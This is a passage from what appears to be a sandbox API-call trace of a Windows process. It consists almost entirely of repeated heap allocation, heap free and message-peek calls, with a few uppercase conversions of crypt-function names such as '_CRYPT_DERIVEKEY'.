(HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0037.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0037.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0037.738] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0037.738] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.739] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0037.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0037.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.739] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0037.739] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.739] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.739] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da218 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd18 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.740] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.740] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0037.740] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.740] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0037.741] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0037.741] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0037.741] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.741] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9a0 [0037.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0037.741] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.741] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.741] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0037.741] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889688 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0037.741] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1760 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0037.742] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0037.742] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0037.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0037.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0037.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2140 [0037.742] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0037.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0037.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0037.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0037.742] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0037.742] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0037.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.742] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0037.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da138 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0037.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cb50 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0037.743] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1738 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0037.743] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0037.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0037.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0037.744] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1bc0 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0037.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0037.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0037.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0037.744] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0037.744] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b48 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0037.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0037.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c10 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0037.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0037.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0037.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.745] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0037.745] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0037.745] RtlAllocateHeap 